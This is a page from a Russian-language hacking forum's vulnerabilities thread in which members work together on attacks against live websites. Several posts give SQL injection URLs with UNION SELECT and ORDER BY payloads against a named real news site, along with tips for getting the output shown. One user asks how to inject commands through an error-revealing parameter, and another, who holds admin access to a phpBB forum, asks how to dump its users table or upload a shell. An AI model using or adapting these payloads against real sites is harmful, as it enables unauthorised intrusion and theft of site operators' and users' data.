HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5041  
Старый 25.01.2009, 23:32
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
С нами: 9103414

Репутация: 0
По умолчанию

Цитата:
Сообщение от j0ker13  
2Neponomat а ключ /s не катит?)
а что это означает?
 
Ответить с цитированием

  #5042  
Старый 25.01.2009, 23:38
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами: 9227224

Репутация: 60
По умолчанию

http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32

я так понял стоит фильтрация на union?
 
Ответить с цитированием

  #5043  
Старый 25.01.2009, 23:47
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
Чтобы увидеть вывод: =-3237)+union...
 
Ответить с цитированием

  #5044  
Старый 25.01.2009, 23:54
KranC
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9101880

Репутация: 0
По умолчанию

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
 
Ответить с цитированием

  #5045  
Старый 25.01.2009, 23:57
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Цитата:
Сообщение от KranC  
с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
Читайте внимательнее, сверху же l1ght написал....

Что значит "union отключен"? )))
 
Ответить с цитированием

  #5046  
Старый 26.01.2009, 00:09
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Цитата:
Сообщение от KranC  
с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
методом научного тыка =\ order by 33 нет вывода а 32 есть. читаем статьи. а лучше изучить логику скл запросов.
 
Ответить с цитированием

  #5047  
Старый 26.01.2009, 01:58
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
 
Ответить с цитированием

  #5048  
Старый 26.01.2009, 14:47
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами: 9100829

Репутация: 0
По умолчанию

Вообщем такая ситуация нарисовалась =) нашел уязвимость..но ничего не могу сделать т.е - The following SQL error occurred: The following table could not be opened.
d:\88.4.211.213\[securedir?????????]/webgene\//*{}*\\
(101)

вот что пишет ... вот это значение могу менять - //*{}*\\ ...т.е запрос типа
?p_file=//*{}*\\&
можно вывести 1001 ошибку... кто подскажет как инжект параметр туда...всё перепробовал никак не катит... ну чтобы таблицы получить или команду выполнить
Кстати да...это не PHP движок а простой хтмл ну как вы видите... или я ошибаюсь =)
 
Ответить с цитированием

  #5049  
Старый 26.01.2009, 14:52
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Урлу сюда
 
Ответить с цитированием

  #5050  
Старый 26.01.2009, 17:25
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами: 9121266

Репутация: 13
По умолчанию

здравствуйте
у меня есть доступ к админке phpbb 2.0.13
мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php

как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.